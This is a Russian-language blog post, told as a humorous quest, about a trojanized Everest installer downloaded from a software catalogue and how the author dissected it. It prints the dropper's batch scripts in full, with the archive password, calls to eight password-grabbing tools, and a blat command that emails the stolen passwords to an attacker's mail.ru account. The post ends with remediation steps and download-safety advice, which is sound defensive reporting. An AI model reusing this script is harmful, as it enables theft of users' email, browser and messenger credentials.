Информационная безопасность.

A+ A-

Как элементарно обходятся антивирусы и их «поведенческие анализаторы» 

Довелось сегодня скачать и запустить Everest с сайта softportal.com. В результате все почтовые, браузерные и FTP-пароли утекли некоему «Фомке», и все это при живом и активно работающем Касперском. Как такое случилось? Квест расписан под катом.



Персонаж:
— ранг: IT-специалист
— подозрительность: 4/5
— опыт: 5/5
— навыки общения: 1/5

Инвентарь:
— Windows 7 лицензионная с включенным UAC
— Kaspersky 2011 лицензионный со свежими базами в рекомендуемом режиме

Ход игры:

1 турн. «Скачай Everest»

не требует ничего — ок.

Вбиваем в google «Everest» и видим на первой странице одним из первых результатов видим Softportal.com — -1 к подозрительности.

Переходим на страницу — видим, что нам предлагают скачать trial-версию с сайта разработчика, проверенную старой опытной командой софтпортала «гарантированно без вирусов» — -2 к подозрительности.

Скачиваем приложение по ссылке — обычный инсталлятор на ~ 7мб — -1 к подозрительности

2 турн. «Установи Everest»

требует 0/5 подозрительности — ок.

Запускаем exe-шник, вылетает окно граббера паролей из Chrome — +5 к подозрительности, на игрока падает проклятие «Паника»

Прибиваем процесс, забираем приложение в песочницу на изучение.

3 турн. «Разбери инсталлятор».

требует 5/5 опыта — ок.

С помощью filemon анализируем работу инсталлятора. Выясняется, что он при запуске создает в %temp% временный каталог со случайным названием (в текущем случае — «11DA.tmp»), в котором лежат:

• wrar403.rar — запароленый архив
• everest.exe — оригинальный инсталлятор
• frarx.exe — консольный rar-распаковщик
• hidcon.exe — утилита для скрытого запуска консольных скриптов
• colread.bat — классический батник с содержимым:
  

  @;everest.exe
  @;start /wait /min frarx.exe e -provaiders wrar403.rar
  @;call hidcon.exe ip.bat

Извлекаем с помощью frarx.exe и паролем «rovaiders» (хакер у нас с чувством юмора) содержимое архива. Внутри:

• Большой набор утилит, извлекающих пароли отовсюду: MPD.exe (почта), BrPD.exe (браузеры),
  FPD.exe (Firefox), MesPD.exe (мессенджеры, в т.ч. миранда), MPD-icq.exe (еще пак мессенджеров), IEPD.exe (ослик), ChPD.exe (хромовские пароли), FireP.exe (еще один граббер для лисы)
• blat.exe — консольный мейлер
• ip.bat — батник с содержимым:
  

  
  @echo off
  
  MPD.exe  output1.txt
  BrPD.exe  output2.txt
  FPD.exe  output3.txt
  MesPD.exe  output4.txt
  MPD-icq.exe  output5.txt
  IEPD.exe output6.txt
  ChPD.exe output7.txt
  FireP.exe -p
  FireP.exe > output8.txt
  copy output1.txt+output2.txt+output3.txt+output4.txt+output5.txt+output6.txt+output7.txt+output8.txt pass.txt
  
  blat.exe -install -server smtp.mail.ru -port 25 -f for-fomka@mail.ru -u for-fomka -pw pn3w6sg42zk
  blat.exe -to fomka-everest@mail.ru -subject "Razrabotki ot fomki 2011-ever" -attachi "pass.txt" -body "Vse narabotki vo vlozhenii"
  
  del /f /q localip.txt
  del /f /q realip.txt
  del /f /q output1.txt
  del /f /q output2.txt
  del /f /q output3.txt
  del /f /q output4.txt
  del /f /q output5.txt
  del /f /q output6.txt
  del /f /q output7.txt
  del /f /q output8.txt
  del /f /q pass.txt
  del /f /q MPD.exe
  del /f /q BrPD.exe
  del /f /q FPD.exe
  del /f /q MesPD.exe
  del /f /q MPD-icq.exe
  del /f /q IEPD.exe
  del /f /q ChPD.exe
  del /f /q FireP.exe
  del /f /q blat.exe
  del /f /q blat.lib
  del /f /q blat.dll
  del /f /q sb1.rar
  del /f /q UnRAR.exe
  del /f /q hidcon.exe
  del %0
  

Как видим, все до ужаса примитивно. Тупо сбор паролей из кучи утилит в один текстовый файл и отправка полученного файла в виде аттача на указанный email. При этом список удаляемых файлов явно кочует между разными сборками «пинча», и не корректируется под конкретный пакет.

4 турн. «Разберись с последствиями».

требует много времени — не ок, но куда теперь деваться…

Меняем все пароли на всех сайтах, аське, почте, и попутно внедряем keepass.

5 турн. «Принимаем меры»

Первым делом идем на mail.ru под «отправляющим» аккаунтом и меняем там пароль и контрольный вопрос. Все, почта у жертв больше не будет уходить.

5.1. Пишем в поддержку mail.ru о том, что на ящике fomka-everest@mail.ru собираются краденые пароли.

требует 4/5 навыков общения — не ок, но попробуем.

Неудача. Робот-блондинка просит прислать заголовки спам-письма (?). *

5.2. Пишем в softportal.com о том, что они распространяют вирус.

требует 3/5 навыков общения — не ок, но попробуем.

Нет отклика.

5.3. Отправляем файл на анализ к Kaspersky.

требует 1/5 навыков общения — ок.

Успех. Заявка принята и обрабатывается — +1 к навыкам общения

5.4. Пишем пост на хабр.

требует 5/5 навыков общения — не ок, но попробуем.

Ожидание результата… **

Итоговая мораль

Windows-зло. Доверчивость — плохо. Не стоит покупаться на «авторитетность» сайтов. Никаких сайтов-каталогов ПО. Только официальный сайт официального разработчика. Не «русское сообщество», не «сайт русской версии». Даже если перед вами сайт, утверждающий, что он — «официальный» — ему тоже верить нельзя — проверяем по whois, звоним по телефонам, отправляем дистрибутив на анализ. И это не паранойя. В наше время, когда первые 100 страниц поисковиков по любому софтовому запросу забиты троянами — софт лучше вообще не качать «из интернета», а пользоваться проверенными старыми версиями из своего личного архива, и ждать аналога AppStore от Microsoft.

P.S. Я понимаю, что для кого-то это все «прописные истины», а кто-то «всю жизнь качает все, и никаких проблем не имеет». Я бы тоже и дальше оставался в этих двух группах, если бы хромовский граббер в вышеописанной сборке не заглючил, и не вывел свое окно с вопросом. Многочасовая смена всех паролей здорово отрезвляет. Не защищен никто.

Примечание НЛО

+1 инвайт, +1 к внмиталеньсоти и навыку самообразования

* UPD: Mail.ru уведомил, что заблокировал оба ящика «злоумышленников».
** UPD: Смотри «примечание НЛО».

Posted in: антивирус, Касперский, квест, кража паролей